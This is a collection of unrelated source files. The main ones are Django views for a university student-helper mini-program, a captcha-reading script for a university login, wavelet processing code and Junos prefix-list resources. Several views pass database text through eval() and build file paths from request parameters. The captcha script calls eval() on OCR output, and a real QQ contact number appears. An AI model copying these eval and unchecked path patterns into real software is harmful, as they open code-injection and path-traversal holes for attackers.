stu.update(searchTimes=lastTime+','+str(nremainTimes))
else:
nremainTimes = int(remainTimes)
return HttpResponse(json.dumps({'count': len(searchList),'result':searchList,'times':nremainTimes}, ensure_ascii=False),
content_type="application/json,charset=utf-8")
else:
return HttpResponse(json.dumps({'err': '同学,你今天的查询次数已满哦~'}, ensure_ascii=False),
content_type="application/json,charset=utf-8")
else:
if thisStu.classMonitor == 1:
nlastTime = date
nremainTimes = '4'
ncontent = nlastTime + ',' + nremainTimes
stu.update(searchTimes=ncontent)
searchList = []
for s in Teachers.objects.filter(name__contains=tname).order_by('name'):
item = {
'name': s.name,
'collegeName': s.collegeName,
'title': s.title,
'phoneNumber': s.phoneNumber
}
searchList.append(item)
content = ('【%s】%s学号查询[%s]' % (datetime.datetime.now().strftime('%H:%M:%S'), xh, tname))
writeLog(content)
return HttpResponse(json.dumps({'count': len(searchList),'result':searchList,'times':int(nremainTimes)}, ensure_ascii=False),
content_type="application/json,charset=utf-8")
else:
nlastTime = date
nremainTimes = '2'
ncontent = nlastTime + ',' + nremainTimes
stu.update(searchTimes=ncontent)
searchList = []
for s in Teachers.objects.filter(name__contains=tname).order_by('name'):
item = {
'name': s.name,
'collegeName': s.collegeName,
'title': s.title,
'phoneNumber': s.phoneNumber
}
searchList.append(item)
content = ('【%s】%s学号查询[%s]' % (datetime.datetime.now().strftime('%H:%M:%S'), xh, tname))
writeLog(content)
return HttpResponse(json.dumps({'count': len(searchList),'result':searchList,'times':int(nremainTimes)}, ensure_ascii=False),
content_type="application/json,charset=utf-8")
def searchExcept(request):
myconfig = Config.objects.all().first()
if myconfig.apichange:
data = {
'xh':request.POST.get("xh"),
'tname':request.POST.get("tname"),
'collegeName':request.POST.get("collegeName"),
'content':request.POST.get("content")
}
res = requests.post(url=myconfig.otherapi+"/info/scallback",data=data)
return HttpResponse(json.dumps(json.loads(res.text), ensure_ascii=False),
content_type="application/json,charset=utf-8")
xh = request.POST.get("xh")
tname = request.POST.get("tname")
collegeName = request.POST.get("college")
content = request.POST.get("content")
ServerChan = config["ServerChan"]
text = "黄页反馈"
if ServerChan == "none":
return HttpResponse(json.dumps({'err':'反馈失败,管理员未打开反馈接口'}, ensure_ascii=False),
content_type="application/json,charset=utf-8")
else:
requests.get(ServerChan + 'text=' + text + '&desp=' + str(xh) + '\n' + str(tname) + str(collegeName) + '\n' + str(content))
return HttpResponse(json.dumps({'msg':'反馈成功'}, ensure_ascii=False),
content_type="application/json,charset=utf-8")
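# classGrades builds a per-class score sheet: the most recently updated classmate's cached
# Grades-<yt>.json supplies the course columns (falling back to the next student on error), every
# classmate's cache is merged in, and the sheet is written to data/classes/<className>.xlsx and
# streamed back as a download.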
def classGrades(request):
myconfig = Config.objects.all().first()
if myconfig.apichange:
res = requests.get(url=myconfig.otherapi+"/info/classgrades?className=" + request.GET.get("className") + "&yt=" + request.GET.get("yt"))
return HttpResponse(json.dumps(json.loads(res.text), ensure_ascii=False),
content_type="application/json,charset=utf-8")
className = request.GET.get("className")
yt = request.GET.get("yt")
year = yt[0:4]
term = yt[4:5]
studentIdList = []
for i in Students.objects.filter(className=className).order_by("studentId"):
studentIdList.append(i.studentId)
res = []
lastCourses = []
try:
lastStu = Students.objects.filter(className=className).order_by("-updateTime")[0].studentId
with open('data/' + str(lastStu)[0:2] + '/' + str(lastStu) + '/Grades-' + yt + '.json') as l:
lastReq = json.loads(l.read())
for course in lastReq.get("course"):
if course.get("courseNature") != "通识教育任选" and course.get("courseNature") != "无" and course.get("gradeNature") == "正常考试":
lastCourses.append(course.get("courseTitle"))
except:
lastStu = Students.objects.filter(className=className).order_by("-updateTime")[1].studentId
with open('data/' + str(lastStu)[0:2] + '/' + str(lastStu) + '/Grades-' + yt + '.json') as l:
lastReq = json.loads(l.read())
for course in lastReq.get("course"):
if course.get("courseNature") != "通识教育任选" and course.get("courseNature") != "无" and course.get("gradeNature") == "正常考试":
lastCourses.append(course.get("courseTitle"))
for stu in studentIdList:
nowUrl = 'data/' + str(stu)[0:2] + '/' + str(stu) + '/Grades-' + yt + '.json'
try:
with open(nowUrl,mode='r',encoding='UTF-8') as f:
stuReq = json.loads(f.read())
stuRes = {
'name':stuReq.get("name"),
'xh':stuReq.get("studentId"),
'grades':[{
'n':item.get("courseTitle"),
'g':item.get("grade")
}for item in stuReq["course"] if item.get("courseNature") != "通识教育任选" and item.get("courseNature") != "无" and item.get("gradeNature") == "正常考试"]
}
res.append(stuRes)
except:
res.append({'name':Students.objects.get(studentId=int(str(stu))).name,'xh':str(stu),'grades':[]})
result = {'lastCourses':lastCourses,'res':res}
writeToExcel(result,'data/classes/'+className+'.xlsx')
try:
file = open('data/classes/'+className+'.xlsx', 'rb')
except:
return HttpResponse(json.dumps({'error': "文件不存在"}, ensure_ascii=False),
content_type="application/json,charset=utf-8")
response = FileResponse(file)
response['Content-Type'] = 'application/octet-stream'
response["Content-Disposition"] = "attachment; filename*=UTF-8''{}".format(escape_uri_path(className)+'.xlsx')
return response
def book_search(request):
type = request.GET.get("type")
content = request.GET.get("content")
page = request.GET.get("page")
result = Search()
res = result.search_book(type,content,page)
return HttpResponse(json.dumps(res, ensure_ascii=False),
content_type="application/json,charset=utf-8")
def book_detail(request):
marc = request.GET.get("marc")
result = Search()
res = result.book_detail(marc)
return HttpResponse(json.dumps(res, ensure_ascii=False),
content_type="application/json,charset=utf-8")
def library_info(request):
xh = request.POST.get("xh")
ppswd = request.POST.get("ppswd")
lgn = PLogin()
cookies = lgn.login(xh,ppswd)
person = Personal(cookies)
res = person.get_info()
return HttpResponse(json.dumps(res, ensure_ascii=False),
content_type="application/json,charset=utf-8")
def library_list(request):
xh = request.POST.get("xh")
ppswd = request.POST.get("ppswd")
lgn = PLogin()
cookies = lgn.login(xh,ppswd)
person = Personal(cookies)
res = person.book_list()
return HttpResponse(json.dumps(res, ensure_ascii=False),
content_type="application/json,charset=utf-8")
def library_hist(request):
xh = request.POST.get("xh")
ppswd = request.POST.get("ppswd")
lgn = PLogin()
cookies = lgn.login(xh,ppswd)
person = Personal(cookies)
res = person.book_hist()
return HttpResponse(json.dumps(res, ensure_ascii=False),
content_type="application/json,charset=utf-8")
def library_paylist(request):
xh = request.POST.get("xh")
ppswd = request.POST.get("ppswd")
lgn = PLogin()
cookies = lgn.login(xh,ppswd)
person = Personal(cookies)
res = person.paylist()
return HttpResponse(json.dumps(res, ensure_ascii=False),
content_type="application/json,charset=utf-8")
def library_paydetail(request):
xh = request.POST.get("xh")
ppswd = request.POST.get("ppswd")
lgn = PLogin()
cookies = lgn.login(xh,ppswd)
person = Personal(cookies)
res = person.paydetail()
return HttpResponse(json.dumps(res, ensure_ascii=False),
content_type="application/json,charset=utf-8")
def school_card(request):
xh = request.POST.get("xh")
ppswd = request.POST.get("ppswd")
page = request.POST.get("page")
lgn = PLogin()
cookies = lgn.plogin(xh,ppswd)
person = Infos(cookies)
res = person.school_card(page)
return HttpResponse(json.dumps(res, ensure_ascii=False),
content_type="application/json,charset=utf-8")
def financial(request):
xh = request.POST.get("xh")
ppswd = request.POST.get("ppswd")
page = request.POST.get("page")
lgn = PLogin()
cookies = lgn.plogin(xh,ppswd)
person = Infos(cookies)
res = person.financial(page)
return HttpResponse(json.dumps(res, ensure_ascii=False),
content_type="application/json,charset=utf-8")
def award(request):
if request.method == "POST":
keyword = request.POST.get("keyword")
else:
keyword = request.GET.get("keyword")
url = "http://xcctw.cn/app/index.php?keyword=" + keyword + "&i=2&c=entry&a=site&do=fm&m=yoby_cha&rid=13"
res = requests.get(url=url)
soup = BeautifulSoup(res.text,'lxml')
if soup.find(class_="weui-msgbox"):
return HttpResponse(json.dumps({'err':"没有查询到结果"}, ensure_ascii=False),
content_type="application/json,charset=utf-8")
list = soup.find_all(class_="weui-cell__bd")
result = []
for items in list:
name = (items.find_all(class_="f16")[0].get_text()[3:]).strip()
studentId = (items.find_all(class_="f16")[1].get_text()[3:]).strip()
college = (items.find_all(class_="f16")[2].get_text()[5:]).strip()
major = (items.find_all(class_="f16")[3].get_text()[3:]).strip()
detail = (items.find_all(class_="f16")[4].get_text()[5:]).strip()
number = (items.find_all(class_="f16")[5].get_text()[5:]).strip()
items = {'name':name,'studentId':studentId,'college':college,'major':major,'detail':detail,'number':number}
result.append(items)
return HttpResponse(json.dumps(result, ensure_ascii=False),
content_type="application/json,charset=utf-8")
def get_maps(request):
if request.method == "GET":
xh = request.GET.get("xh")
elif request.method == "POST":
xh = request.POST.get("xh")
allIn = Students.objects.all().count()
thisStu = Students.objects.get(studentId=int(xh))
thisStuBirthDayAndMonth = (thisStu.birthDay)[5:]
names = Students.objects.filter(name=thisStu.name).count() - 1
birthDay = Students.objects.filter(birthDay=thisStu.birthDay).count() - 1
birthDayAndMonth = Students.objects.filter(birthDay__contains=thisStuBirthDayAndMonth).count() - 1
classBirthDay = Students.objects.filter(className=thisStu.className,birthDay=thisStu.birthDay).count() - 1
classBirthDayAndMonth = Students.objects.filter(className=thisStu.className,birthDay__contains=thisStuBirthDayAndMonth).count() - 1
graduationSchool = Students.objects.filter(graduationSchool=thisStu.graduationSchool).count() - 1
classGraduationSchool = Students.objects.filter(className=thisStu.className,graduationSchool=thisStu.graduationSchool).count() - 1
domicile = Students.objects.filter(domicile=thisStu.domicile).count() - 1
classDomicile = Students.objects.filter(className=thisStu.className,domicile=thisStu.domicile).count() - 1
res = {
'allIn': allIn,
'name': names,
'birthDay': birthDay,
'birthDayAndMonth': birthDayAndMonth,
'classBirthDay': classBirthDay,
'classBirthDayAndMonth': classBirthDayAndMonth,
'graduationSchool': graduationSchool,
'classGraduationSchool': classGraduationSchool,
'domicile': domicile,
'places':thisStu.domicile,
'classDomicile': classDomicile
}
return HttpResponse(json.dumps(res, ensure_ascii=False),
content_type="application/json,charset=utf-8")
def isMonitor(request):
xh = request.GET.get("xh")
if Students.objects.filter(studentId=int(xh)):
thisStu = Students.objects.get(studentId=int(xh))
res = {"code":200,"monitor":True if thisStu.classMonitor == 1 else False}
return HttpResponse(json.dumps(res, ensure_ascii=False),
content_type="application/json,charset=utf-8")
else:
return HttpResponse(json.dumps({"err":"没有这个同学"}, ensure_ascii=False),
content_type="application/json,charset=utf-8")
def freetime(request):
myconfig = Config.objects.all().first()
xh = request.GET.get("xh")
term = request.GET.get("term") if request.GET.get("term") is not None else myconfig.nSchedule
weeks = request.GET.get("weeks") if request.GET.get("weeks") is not None else myconfig.nowweek
mode = request.GET.get("mode") if request.GET.get("mode") is not None else "1"
datafile = 'data/' + xh[0:2] + "/" + xh + "/" + "Schedules-" + term + ".json"
fullSections = [1,2,3,4,5,6,7,8,9,10,11,12]
if os.path.exists(datafile):
with open(datafile,mode='r',encoding='UTF-8') as f:
schedule_data = json.loads(f.read())
res = {"Mon":[],"Tue":[],"Wed":[],"Thu":[],"Fri":[]}
for item in schedule_data["normalCourse"]:
if item["courseWeekday"] == "1" and int(weeks) in item["includeWeeks"]:
res["Mon"].extend(item["includeSection"])
elif item["courseWeekday"] == "2" and int(weeks) in item["includeWeeks"]:
res["Tue"].extend(item["includeSection"])
elif item["courseWeekday"] == "3" and int(weeks) in item["includeWeeks"]:
res["Wed"].extend(item["includeSection"])
elif item["courseWeekday"] == "4" and int(weeks) in item["includeWeeks"]:
res["Thu"].extend(item["includeSection"])
elif item["courseWeekday"] == "5" and int(weeks) in item["includeWeeks"]:
res["Fri"].extend(item["includeSection"])
else:
pass
if mode == "1":
res["Mon"] = diffList(fullSections,res["Mon"])
res["Tue"] = diffList(fullSections,res["Tue"])
res["Wed"] = diffList(fullSections,res["Wed"])
res["Thu"] = diffList(fullSections,res["Thu"])
res["Fri"] = diffList(fullSections,res["Fri"])
return HttpResponse(json.dumps(res, ensure_ascii=False),
content_type="application/json,charset=utf-8")
else:
return HttpResponse(json.dumps({"err":"原因:1.该同学没有使用“西院助手”小程序。2.没有在小程序请求过该学期课程信息。3.还未到该学期"}, ensure_ascii=False),
content_type="application/json,charset=utf-8")
```
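The `freetime` view above relies on a `diffList` helper that is defined elsewhere in the project. A minimal sketch of the behaviour the view appears to assume (the free sections are the full section list minus the occupied ones, with order preserved); the function body is an assumption, not the project's actual implementation:
```python
def diffList(full_sections, used_sections):
    # assumed behaviour: keep every section index that is not occupied by a course
    return [s for s in full_sections if s not in used_sections]

# e.g. diffList([1, 2, 3, 4], [2, 3]) -> [1, 4]
```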
#### File: zfnweb/mp/__init__.py
```python
from django.apps import AppConfig
import os
default_app_config = 'mp.MpConfig'
# Get the name of the folder containing this app; if the folder is renamed, this picks it up dynamically
def get_current_app_name(_file):
return os.path.split(os.path.dirname(_file))[-1]
class MpConfig(AppConfig):
    # The app folder name could also be hard-coded here; if the folder is renamed, this would need updating too
# name = 'df_goods'
    name = get_current_app_name(__file__)  # originally 'df_goods'; here it resolves to the containing folder, i.e. 'mp'
verbose_name = '小程序'
```
#### File: zfnweb/mp/views.py
```python
from django.shortcuts import render,HttpResponse
from mp.models import Notices,Config,Navigate,About,Countdown
import json
import time,datetime
from pytz import timezone
import requests
cst_tz = timezone('Asia/Shanghai')
def index(request):
return HttpResponse('mp_index here')
def importantNotice():
if Notices.objects.filter(important=True):
important = Notices.objects.get(important=True)
res = {
'title':important.title,
'detail':important.detail,
'key':important.key
}
return res
else:
return 'none'
def autoCalWeeks(date1):
myconfig = Config.objects.all().first()
date1=time.strptime(date1,"%Y-%m-%d")
date2 = datetime.datetime.now().timetuple()
date1=datetime.datetime(date1[0],date1[1],date1[2])
date2=datetime.datetime(date2[0],date2[1],date2[2])
differ=date2-date1
weekth=differ//datetime.timedelta(days=7)+1
myconfig.nowweek = weekth
myconfig.save()
return weekth
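# Worked example with illustrative dates: with startDate 2021-03-01 and a current date of
# 2021-03-10, differ is 9 days, 9 // 7 == 1, so autoCalWeeks returns week 2.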
def mconfig(request):
myconfig = Config.objects.all().first()
if myconfig.apichange:
res = requests.get(url=myconfig.otherapi+"/mp/conf")
return HttpResponse(json.dumps(json.loads(res.text), ensure_ascii=False),
content_type="application/json,charset=utf-8")
res = {
'version': myconfig.version,
'nChoose': myconfig.nChoose,
'nGrade': myconfig.nGrade,
'nSchedule': myconfig.nSchedule,
'vacation': myconfig.vacation,
'nowweek': autoCalWeeks((myconfig.startDate).strftime('%Y-%m-%d')) if myconfig.autoCalWeeks else myconfig.nowweek,
'choose': myconfig.choose,
'notice': [{
'title':i.title,
'ltitle':i.ltitle,
'image':i.image,
'detail':eval(repr(i.detail).replace('\\\\', '\\')),
'show':i.show,
'date':(i.date).astimezone(cst_tz).strftime("%Y-%m-%d %H:%M")
}for i in Notices.objects.filter(important=False,show=True).all().order_by('-date')],
'important':importantNotice()
}
return HttpResponse(json.dumps(res, ensure_ascii=False),
content_type="application/json,charset=utf-8")
def countTime(date):
if date != "none":
nowdate = datetime.datetime.now()
rdate = datetime.datetime.strptime(date, '%Y-%m-%d')
days = (rdate - nowdate).days + 1
return ("%d天" % days)
else:
return "暂定"
def countdown(request):
myconfig = Config.objects.all().first()
if myconfig.apichange:
res = requests.get(url=myconfig.otherapi+"/mp/countdown")
return HttpResponse(json.dumps(json.loads(res.text), ensure_ascii=False),
content_type="application/json,charset=utf-8")
res = [{
'name': i.name,
'shortname': eval(repr(i.shortname).replace('\\\\', '\\')),
'date': countTime(i.date)
}for i in Countdown.objects.all()]
return HttpResponse(json.dumps(res, ensure_ascii=False),
content_type="application/json,charset=utf-8")
def navigate(request):
myconfig = Config.objects.all().first()
if myconfig.apichange:
res = requests.get(url=myconfig.otherapi+"/mp/navigate?type=" + request.GET.get("type"))
return HttpResponse(json.dumps(json.loads(res.text), ensure_ascii=False),
content_type="application/json,charset=utf-8")
type = request.GET.get("type")
if type == 'school':
school_res = [{
'title':i.title,
'ltitle':i.ltitle,
'content':eval(repr(i.content).replace('\\\\', '\\')),
'image':i.image if i.image != 'none' else False
}for i in Navigate.objects.filter(type="school").all().order_by('title')]
return HttpResponse(json.dumps(school_res, ensure_ascii=False),
content_type="application/json,charset=utf-8")
elif type == 'bar':
bar_res = [{
'title':j.title,
'ltitle':j.ltitle,
'content':eval(repr(j.content).replace('\\\\', '\\')),
'image':j.image if j.image != 'none' else False
}for j in Navigate.objects.filter(type="bar").all().order_by('title')]
return HttpResponse(json.dumps(bar_res, ensure_ascii=False),
content_type="application/json,charset=utf-8")
else:
return HttpResponse(json.dumps({'err':"缺少参数type"}, ensure_ascii=False),
content_type="application/json,charset=utf-8")
def about(request):
myconfig = Config.objects.all().first()
if myconfig.apichange:
res = requests.get(url=myconfig.otherapi+"/mp/about")
return HttpResponse(json.dumps(json.loads(res.text), ensure_ascii=False),
content_type="application/json,charset=utf-8")
about = {
"qa":[{
"question": i.title,
"answer": eval(repr(i.content).replace('\\\\', '\\'))
}for i in About.objects.filter(type=1).all().order_by('dates')],
"license":[{
"title": j.title,
"content": eval(repr(j.content).replace('\\\\', '\\'))
}for j in About.objects.filter(type=2).all().order_by('dates')],
"money":[ k.title + "-" + k.content + ":"+ (k.dates).astimezone(cst_tz).strftime("%Y-%m-%d") for k in About.objects.filter(type=3).all().order_by('dates')],
"aboutus":{
"title": About.objects.filter(type=4).first().title,
"content": eval(repr(About.objects.filter(type=4).first().content).replace('\\\\', '\\'))
},
"contact":{
"wechat":"RiotJS",
"email":"<EMAIL>",
"qq": "709662329"
}
}
return HttpResponse(json.dumps(about, ensure_ascii=False),
content_type="application/json,charset=utf-8")
def outimg(request):
type = request.POST.get("type")
data = request.POST.get("data")
res = {
'msg':'暂不支持导出',
'url':"http://e.hiphotos.baidu.com/zhidao/pic/item/b64543a98226cffc7a951157b8014a90f703ea9c.jpg"
}
return HttpResponse(json.dumps(res, ensure_ascii=False),
content_type="application/json,charset=utf-8")
```
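Several of the views above push stored rich text through `eval(repr(...).replace('\\\\', '\\'))` before serialising it. A small standalone sketch of what that round trip does to a string whose newlines were saved as literal backslash sequences; the sample string is invented:
```python
detail = 'line one\\nline two'   # contains a literal backslash followed by 'n', not a real newline
fixed = eval(repr(detail).replace('\\\\', '\\'))
print(fixed)                     # the escaped sequence is re-interpreted, so this prints two lines
```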
#### File: zfnweb/one/views.py
```python
from django.shortcuts import render
from django.http import HttpResponse, JsonResponse
import os
import json
from bs4 import BeautifulSoup
import requests
import re
import datetime
from mp.models import Config
def get_one(request):
myconfig = Config.objects.all().first()
if myconfig.apichange:
res = requests.get(url=myconfig.otherapi+"/one")
return HttpResponse(json.dumps(json.loads(res.text), ensure_ascii=False),
content_type="application/json,charset=utf-8")
with open('one.txt', mode='r', encoding='utf-8') as f:
if os.path.exists('one.txt'):
lines = f.readlines()
last_line = lines[-1]
# print(last_line)
if datetime.datetime.now().strftime('%Y-%m-%d') in last_line:
                # print('read from cache')
content = last_line[12:]
return HttpResponse(json.dumps({'msg':'success','content':content}, ensure_ascii=False),
content_type="application/json,charset=utf-8")
elif int(datetime.datetime.now().strftime('%H')) < 8:
content = last_line[12:]
return HttpResponse(json.dumps({'msg':'success','content':content}, ensure_ascii=False),
content_type="application/json,charset=utf-8")
else:
with open('one.txt', mode='a', encoding='utf-8') as n:
                    # print('first request for ONE today!')
url = "http://wufazhuce.com/"
r = requests.get(url)
r.encoding = r.apparent_encoding
soup = BeautifulSoup(r.text, 'html.parser')
oneall = soup.find('div', class_=re.compile('fp-one-cita'))
one = oneall.a.string
                    if int(datetime.datetime.now().strftime('%H')) > 8:  # after 9 am the daily ONE quote has definitely been updated
n.write('\n【%s】%s' % (datetime.datetime.now().strftime('%Y-%m-%d'), one))
return HttpResponse(json.dumps({'msg':'success','content':one}, ensure_ascii=False),
content_type="application/json,charset=utf-8")
else:
return HttpResponse(json.dumps({'msg':'error','content':"提醒管理员配置每日一言"}, ensure_ascii=False),
content_type="application/json,charset=utf-8")
``` |
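`get_one` caches each day's quote in `one.txt` as a line of the form `【YYYY-MM-DD】quote` and recovers the text by slicing off the first 12 characters. A quick illustration of that slicing; the sample line is invented:
```python
last_line = '【2021-06-30】Some quote of the day'
date_part = last_line[1:11]   # '2021-06-30'
content = last_line[12:]      # everything after the 12-character 【date】 prefix
print(date_part, '->', content)
```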
{
"source": "Jokerwin/clusteris",
"score": 3
} |
#### File: clusteris/config/interactor.py
```python
import wx
class Interactor(object):
"""Connects the UI events with the Presenter class."""
def Connect(self, presenter, view):
"""Listens to UI evens and asigns an event handler on the Presenter."""
self.presenter = presenter
self.view = view
view.choiceAlgorithm.Bind(wx.EVT_CHOICE, self.OnAlgorithmSelected)
view.spinCentroidsParam.Bind(wx.EVT_SPINCTRL, self.OnCentroidSpinCtrl)
view.radioBtn2D.Bind(wx.EVT_RADIOBUTTON, self.OnRadioButton2DClicked)
view.radioBtn3D.Bind(wx.EVT_RADIOBUTTON, self.OnRadioButton3DClicked)
view.choiceXAxe.Bind(wx.EVT_CHOICE, self.OnXAxeSelected)
view.choiceYAxe.Bind(wx.EVT_CHOICE, self.OnYAxeSelected)
view.choiceZAxe.Bind(wx.EVT_CHOICE, self.OnZAxeSelected)
view.spinPopulationParam.Bind(wx.EVT_SPINCTRL, self.OnPopulationSpinCtrl)
view.spinIterationParam.Bind(wx.EVT_SPINCTRL, self.OnIterationsSpinCtrl)
view.radioFixedClassParam.Bind(wx.EVT_RADIOBUTTON, self.OnRadioFixedClassParamClicked)
view.radioVarClassParam.Bind(wx.EVT_RADIOBUTTON, self.OnRadioVarClassParamClicked)
view.buttonCancel.Bind(wx.EVT_BUTTON, self.OnCancelClicked)
view.buttonProcess.Bind(wx.EVT_BUTTON, self.OnProcessClicked)
view.Bind(wx.EVT_CLOSE, self.OnCancelClicked)
def OnAlgorithmSelected(self, evt):
self.presenter.SetAlgorithm(evt.GetSelection(), evt.GetString())
def OnCentroidSpinCtrl(self, evt):
self.presenter.SetCentroidParam(evt.GetPosition())
def OnRadioButton2DClicked(self, evt):
self.presenter.Radio2DClicked(evt.IsChecked())
def OnRadioButton3DClicked(self, evt):
self.presenter.Radio3DClicked(evt.IsChecked())
def OnXAxeSelected(self, evt):
self.presenter.SetSelectedAxe(0, evt.GetSelection())
def OnYAxeSelected(self, evt):
self.presenter.SetSelectedAxe(1, evt.GetSelection())
def OnZAxeSelected(self, evt):
self.presenter.SetSelectedAxe(2, evt.GetSelection())
def OnPopulationSpinCtrl(self, evt):
self.presenter.SetPopulationParam(evt.GetPosition())
def OnIterationsSpinCtrl(self, evt):
self.presenter.SetIterationParam(evt.GetPosition())
def OnRadioFixedClassParamClicked(self, evt):
self.presenter.RadioFixedClassParamClicked(evt.IsChecked())
def OnRadioVarClassParamClicked(self, evt):
self.presenter.RadioVarClassParamClicked(evt.IsChecked())
def OnProcessClicked(self, evt):
self.presenter.Process()
def OnCancelClicked(self, evt):
self.presenter.Cancel()
``` |
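`Interactor.Connect` only needs the presenter to expose one handler per bound event. A stub showing the interface it relies on; the class name and the empty bodies are placeholders, not the project's real Presenter:
```python
class PresenterStub:
    # one handler per call made by Interactor above; signatures mirror those calls
    def SetAlgorithm(self, index, label): pass
    def SetCentroidParam(self, value): pass
    def Radio2DClicked(self, checked): pass
    def Radio3DClicked(self, checked): pass
    def SetSelectedAxe(self, axis, index): pass
    def SetPopulationParam(self, value): pass
    def SetIterationParam(self, value): pass
    def RadioFixedClassParamClicked(self, checked): pass
    def RadioVarClassParamClicked(self, checked): pass
    def Process(self): pass
    def Cancel(self): pass
```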
{
"source": "joker-xii/login-zhjw",
"score": 3
} |
#### File: joker-xii/login-zhjw/readimg.py
```python
import scan
import os
import string
import sys
tmps = scan.get_templates()
def read_img(name):
# url='https://zhjw.neu.edu.cn/ACTIONVALIDATERANDOMPICTURE.APPPROCESS?id='+urlappend
res = scan.scan_code(name, tmps)
os.remove(name)
return eval(res)
if(len(sys.argv) == 2):
print(read_img(sys.argv[1]))
else:
print(read_img(""))
sys.stdout.flush()
``` |
{
"source": "joker-xii/plant-potential",
"score": 3
} |
#### File: plant-potential/lzc/wavelets.py
```python
import pywt
import pandas as pd
import math
import numpy as np
import matplotlib.pyplot as plt
from lzc.config import *
def read_data(raw, length=SPLIT_SIZE, max_len=MAX_LENGTH):
raw_data = pd.read_csv(raw).iloc[:, 0].values
raw_data = raw_data[:max_len]
sure_value = math.floor(len(raw_data) / length) * length
# print("sure of", sure_value, len(raw_data))
# crop data
raw_data = raw_data[:sure_value]
# split data to length
dds = np.array_split(raw_data, (len(raw_data) / length))
return dds, raw_data
def plot(y,title =""):
plt.title(title)
x = np.linspace(0, len(y) - 1, len(y))
plt.plot(x, y)
plt.show()
def get_transformed(data, func):
retCA = []
retCD = []
    for i in data:
        # single-level DWT of each segment, then pad the coefficients back to the segment length
        (cA, cD) = pywt.dwt(i, func)
        cA = np.pad(cA, (0, len(i) - len(cA)), mode='constant')
        cD = np.pad(cD, (0, len(i) - len(cD)), mode='constant')
retCA = retCA + cA.tolist()
retCD = retCD + cD.tolist()
return retCA, retCD
def plot_each(data, func):
(cA, cD) = pywt.dwt(data[0], func)
plot(cA,'cA of DWTUnit('+func+")")
plot(cD,'cD of DWTUnit('+func+")")
def to_wavs(fname, max_len=MAX_LENGTH, attr='csv'):
datas, rd = read_data(fname + "." + attr, max_len=max_len)
df = pd.DataFrame()
df["basic"] = rd
for i in WAVELETS:
print(i)
ca, cd = get_transformed(datas, i)
df[i + "_cA"] = ca
df[i + "_cD"] = cd
df.to_csv(fname + "_dwt300.csv", float_format='%.3f')
def show_wav(fname, max_len = MAX_LENGTH, attr='csv'):
datas, rd = read_data(fname + "." + attr, max_len=max_len)
plot(datas[0],'input')
for i in WAVELETS:
plot_each(datas,i)
if __name__ == '__main__':
# to_wavs("olddata/m0", max_len=OLD_DATA_LEN, attr='txt')
# to_wavs("olddata/m1", max_len=OLD_DATA_LEN, attr='txt')
# to_wavs("olddata/m2", max_len=OLD_DATA_LEN, attr='txt')
# to_wavs('0m')
# to_wavs('1m')
# to_wavs('2m')
# print(len(pywt.wavelist(kind='discrete')))
# for i in pywt.wavelist(kind='discrete'):
# print(i)
show_wav('1m')
``` |
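`get_transformed` pads each level-1 DWT output back to the segment length so the coefficient columns line up with the raw signal. A short standalone check of those lengths; the wavelet name `'db4'` is only an example:
```python
import numpy as np
import pywt

segment = np.random.rand(300)                      # one SPLIT_SIZE-long chunk
cA, cD = pywt.dwt(segment, 'db4')                  # single-level decomposition
print(len(cA), len(cD))                            # roughly half the segment length
cA_padded = np.pad(cA, (0, len(segment) - len(cA)), mode='constant')
print(len(cA_padded))                              # 300 again, zero-padded at the end
```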
{
"source": "jokerxs/pyez_resources",
"score": 2
} |
#### File: jokerxs/pyez_resources/prefix_list_item.py
```python
from lxml.builder import E
# local module
from jnpr.junos.cfg import Resource
from jnpr.junos import jxml as JXML
class PrefixListItem(Resource):
"""
[edit policy-options prefix-list <name> prefix-list-item <item> ]
Resource name: str
<name> is the prefix-list name
"""
# there are no properties, since the name is the actual data
PROPERTIES = []
# -----------------------------------------------------------------------
# XML readers
# -----------------------------------------------------------------------
def _xml_at_top(self):
return E('policy-options', E('prefix-list',
E.name(self.P.name),
E('prefix-list-item', E.name(self._name))
))
def _xml_at_res(self, xml):
return xml.find('.//prefix-list-item')
def _xml_to_py(self, has_xml, has_py):
Resource._r_has_xml_status(has_xml, has_py)
# -----------------------------------------------------------------------
# Manager List, Catalog
# -----------------------------------------------------------------------
def _r_list(self):
# the key list comes from the parent object.
self._rlist = self.P['$prefix_list_items']
def _r_catalog(self):
# no catalog but the keys
self._rcatalog = dict((k, None) for k in self.list)
```
#### File: jokerxs/pyez_resources/prefix_list.py
```python
from lxml.builder import E
# module packages
from jnpr.junos.cfg import Resource
from jnpr.junos import jxml as JXML
from jnpr.junos.cfg.prefix_list_item import PrefixListItem
class PrefixList(Resource):
"""
    [edit policy-options prefix-list <name>]
Resource name: str
<name> is the prefix-list name
Manages resources:
prefix_list_item, PrefixListItem
"""
PROPERTIES = [
'$prefix_list_items' # read only names of prefix-list-items
]
MANAGES = { 'prefix_list_item': PrefixListItem }
# -----------------------------------------------------------------------
# XML readers
# -----------------------------------------------------------------------
def _xml_at_top(self):
return E('policy-options', E('prefix-list', E.name(self._name)))
def _xml_at_res(self, xml):
return xml.find('.//prefix-list')
def _xml_to_py(self, has_xml, has_py):
Resource._r_has_xml_status(has_xml, has_py)
# prefix-list-item
has_py['$prefix_list_items'] = [ item.text
for item in has_xml.xpath('.//prefix-list-item/name') ]
# -----------------------------------------------------------------------
# Manager List, Catalog
# -----------------------------------------------------------------------
def _r_list(self):
get = E('policy-options', E('prefix-list', JXML.NAMES_ONLY))
got = self.R.get_config(get)
self._rlist = [ name.text
for name in got.xpath('.//prefix-list/name') ]
``` |
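Both resources build their configuration stanzas with lxml's `E` factory. A standalone sketch of the XML that `PrefixList._xml_at_top` produces for an arbitrary name such as `'MGMT'`:
```python
from lxml import etree
from lxml.builder import E

xml = E('policy-options', E('prefix-list', E.name('MGMT')))
print(etree.tostring(xml, pretty_print=True).decode())
# <policy-options>
#   <prefix-list>
#     <name>MGMT</name>
#   </prefix-list>
# </policy-options>
```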
{
"source": "JokerYan/pytorch_image_classification",
"score": 2
} |
#### File: pytorch_image_classification/custom_models/smooth_model.py
```python
import torch
import torch.nn as nn
from utils.debug_tools import save_image_stack, clear_debug_image
class SmoothModel(nn.Module):
def __init__(self, base_model, mean=0, std=0.5, sample_size=20):
super(SmoothModel, self).__init__()
self.base_model = base_model
self.mean = mean
self.std = std
self.sample_size = sample_size
self.adv_filter = None
def forward(self, x):
# input_clone = x.clone().detach()
# input_clone.requires_grad = True
# base_output = self.base_model(input_clone)
# torch.max(base_output).backward()
# grad_data = input_clone.grad.data
# grad_data = torch.abs(grad_data)
# grad_data -= grad_data.min(1, keepdim=True).values
# grad_data /= grad_data.max(1, keepdim=True).values
input_dummy = torch.ones(x.shape)
output_list = []
